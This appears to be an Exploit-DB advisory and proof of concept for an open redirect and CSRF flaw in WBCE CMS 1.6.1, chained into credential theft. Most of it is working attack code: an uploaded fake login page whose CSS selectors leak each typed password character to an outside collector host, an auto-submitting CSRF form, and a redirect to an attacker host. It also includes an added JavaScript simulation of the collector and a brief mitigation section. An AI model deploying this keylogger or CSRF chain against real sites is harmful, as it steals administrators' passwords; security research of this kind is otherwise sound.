vendor:
WBCE CMS
by:
Mirabbas Agalarov
7.5
CVSS
HIGH
Open Redirect & CSRF
CWE
Product Name: WBCE CMS
Affected Version From: 1.6.2001
Affected Version To: 1.6.2001
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux
2023

WBCE CMS 1.6.1 – Open Redirect & CSRF

WBCE CMS 1.6.1 is vulnerable to an open redirect and to cross-site request forgery (CSRF) on its admin login page: the url parameter of the login form is used as a redirect target without being restricted to the CMS's own pages, and the form carries no anti-CSRF token. An attacker who can upload files to the Media manager uploads a crafted HTML page containing a CSS keylogger, then lures a victim to a page that auto-submits the login form with url pointing at that file. The victim is redirected to the attacker's fake login page, served from the CMS's own origin, and the characters typed into its password field are reported to the attacker's server.

Mitigation:

The vendor should release a patch that restricts the login page's url parameter to same-origin paths inside the admin area (rejecting absolute and protocol-relative URLs) and protects the login form with an anti-CSRF token. Until a fixed version is available, administrators should disallow HTML uploads in the Media manager, or serve the media directory so that uploaded files are downloaded rather than rendered as pages, and users should be cautious when clicking untrusted links.

Exploit-DB raw data:

Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF
Version: 1.6.1
Bugs: Open Redirect + CSRF = CSS keylogging
Technology: PHP
Vendor URL: https://wbce-cms.org/
Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
Date found: 03-07-2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================

1. Log in to an account that can use the Media manager.
2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw).
3. Upload an HTML file with the content below. The media directory serves it as a normal page on the CMS origin.

'''
<html>
    <head>
        <title>
            Login
        </title>
        <style>
            input[type="password"][value*="q"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/q');}
            input[type="password"][value*="w"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/w');}
            input[type="password"][value*="e"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/e');}
            input[type="password"][value*="r"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/r');}
            input[type="password"][value*="t"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/t');}
            input[type="password"][value*="y"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/y');}
            input[type="password"][value*="u"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/u');}
            input[type="password"][value*="i"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/i');}
            input[type="password"][value*="o"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/o');}
            input[type="password"][value*="p"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/p');}
            input[type="password"][value*="a"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/a');}
            input[type="password"][value*="s"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/s');}
            input[type="password"][value*="d"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/d');}
            input[type="password"][value*="f"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/f');}
            input[type="password"][value*="g"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/g');}
            input[type="password"][value*="h"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/h');}
            input[type="password"][value*="j"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/j');}
            input[type="password"][value*="k"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/k');}
            input[type="password"][value*="l"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/l');}
            input[type="password"][value*="z"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/z');}
            input[type="password"][value*="x"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/x');}
            input[type="password"][value*="c"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/c');}
            input[type="password"][value*="v"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/v');}
            input[type="password"][value*="b"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/b');}
            input[type="password"][value*="n"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/n');}
            input[type="password"][value*="m"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/m');}
            input[type="password"][value*="Q"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/Q');}
            input[type="password"][value*="W"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/W');}
            input[type="password"][value*="E"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/E');}
            input[type="password"][value*="R"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/R');}
            input[type="password"][value*="T"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/T');}
            input[type="password"][value*="Y"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/Y');}
            input[type="password"][value*="U"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/U');}
            input[type="password"][value*="I"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/I');}
            input[type="password"][value*="O"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/O');}
            input[type="password"][value*="P"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/P');}
            input[type="password"][value*="A"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/A');}
            input[type="password"][value*="S"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/S');}
            input[type="password"][value*="D"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/D');}
            input[type="password"][value*="F"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/F');}
            input[type="password"][value*="G"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/G');}
            input[type="password"][value*="H"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/H');}
            input[type="password"][value*="J"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/J');}
            input[type="password"][value*="K"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/K');}
            input[type="password"][value*="L"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/L');}
            input[type="password"][value*="Z"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/Z');}
            input[type="password"][value*="X"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/X');}
            input[type="password"][value*="C"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/C');}
            input[type="password"][value*="V"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/V');}
            input[type="password"][value*="B"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/B');}
            input[type="password"][value*="N"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/N');}
            input[type="password"][value*="M"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/M');}
            input[type="password"][value*="1"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/1');}
            input[type="password"][value*="2"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/2');}
            input[type="password"][value*="3"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/3');}
            input[type="password"][value*="4"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/4');}
            input[type="password"][value*="5"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/5');}
            input[type="password"][value*="6"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/6');}
            input[type="password"][value*="7"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/7');}
            input[type="password"][value*="8"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/8');}
            input[type="password"][value*="9"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/9');}
            input[type="password"][value*="0"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/0');}
            input[type="password"][value*="-"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/-');}
            input[type="password"][value*="."]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%2E');}
            input[type="password"][value*="_"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%5F');}
            input[type="password"][value*="@"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%40');}
            input[type="password"][value*="?"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3F');}
            input[type="password"][value*=">"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3E');}
            input[type="password"][value*="<"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3C');}
            input[type="password"][value*="="]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3D');}
            input[type="password"][value*=":"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3A');}
            input[type="password"][value*=";"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3B');}
        </style>
    </head>
<body>
    <label>Please enter username and password</label>
    <br><br>
    Password:: <input type="password" />
    <script>
        document.querySelector('input').addEventListener('keyup', (evt)=>{
        evt.target.setAttribute('value', evt.target.value);
        })
    </script>
</body>
</html>
'''
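What the collector behind that page actually receives, as an added example that is not part of the original advisory or of WBCE CMS. It replays a victim typing a password one keyup at a time against the same selector list, with the collector host replaced by a placeholder. Every non-alphanumeric character is percent-encoded in the path, so that "." is not lost to "/." path normalisation and "_" arrives as "_".

```javascript
// Added example (not from the advisory or the WBCE project): replays what
// the collector behind the keylogger page receives. Assumed: COLLECTOR is a
// placeholder for the attacker's endpoint; CHARSET mirrors the uploaded
// file's selector list. Each `input[type="password"][value*="X"]` rule
// triggers one background-image request the first time X appears in the
// mirrored value attribute; the browser caches that URL, so repeated
// characters and characters outside CHARSET never produce a request.
const COLLECTOR = "https://collector.example"; // placeholder, not a real host

const CHARSET = [
  ..."qwertyuiopasdfghjklzxcvbnm",
  ..."QWERTYUIOPASDFGHJKLZXCVBNM",
  ..."1234567890",
  ..."-._@?><=:;",
];

// URL path segment for one character. Every non-alphanumeric character is
// percent-encoded so that "." cannot be swallowed by "/." path normalisation
// and "_" (%5F) is not confused with "`" (%60).
function pathFor(ch) {
  const seg = /^[A-Za-z0-9]$/.test(ch)
    ? ch
    : "%" + ch.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0");
  return `${COLLECTOR}/${seg}`;
}

// Simulates the victim typing `password` one character per keyup. After each
// keyup the page's script copies the live value into the value attribute, the
// selectors are re-evaluated, and any newly matching rule fetches its image.
// Returns the image URLs in the order the browser would request them.
function simulateKeylogger(password) {
  const fetched = new Set();   // browser image cache: one request per URL
  const requests = [];
  for (let typed = 1; typed <= password.length; typed++) {
    const mirrored = password.slice(0, typed);  // value attribute after keyup
    for (const ch of CHARSET) {
      const url = pathFor(ch);
      if (mirrored.includes(ch) && !fetched.has(url)) {
        fetched.add(url);
        requests.push(url);
      }
    }
  }
  return requests;
}

// What the collector log yields: distinct characters in first-appearance
// order. "Hello123!" comes back as "Helo123" (second "l" and "!" lost).
function reconstruct(requests) {
  return requests
    .map((u) => decodeURIComponent(u.slice(COLLECTOR.length + 1)))
    .join("");
}

// Demo with the password from the advisory's captured login request.
const demo = simulateKeylogger("Hello123!");
console.log(demo.map((u) => u.slice(COLLECTOR.length)));
console.log("attacker reconstructs:", reconstruct(demo));
```

The selector channel therefore reports which characters occur and the order in which each first appears, nothing more: repeated characters and characters with no selector (such as "!") never reach the collector, so the attacker gets a strong hint rather than the full password.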

4. Open the uploaded file at its media URL (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy that URL.
5. Log out and return to the login page (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php). A login submission looks like the request below; note the url parameter:


POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1
Host: localhost
Content-Length: 160
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg
Connection: close

url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login
 
6. If you set the url parameter of the above request to https://ATTACKER.com, the login page redirects you to attacker.com: the parameter is used as a redirect target without being restricted to the CMS's own pages (open redirect).
7. Put the uploaded HTML file's URL in that parameter:

url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html

8. Generate a CSRF PoC (for example with a CSRF PoC generator) that auto-submits a form carrying only the url parameter to the login page. The login form has no anti-CSRF token, so the cross-site submission is accepted:

<html>
  <head>
    <title>
      This CSRF was found by miri
    </title>
  </head>
  <body>
    <h1>
      CSRF POC
    </h1>
    <form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded">
      <input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>


9. When the victim opens the PoC page, the form submits itself, the login endpoint redirects the victim to the uploaded HTML file, and that fake login page reports what is typed into its password field to the attacker's server. Because each selector's background image is requested only once and then cached, the attacker learns each distinct character in the order it is first typed; repeated characters, and characters not covered by a selector, are not reported.


PoC video: https://youtu.be/m-x_rYXTP9E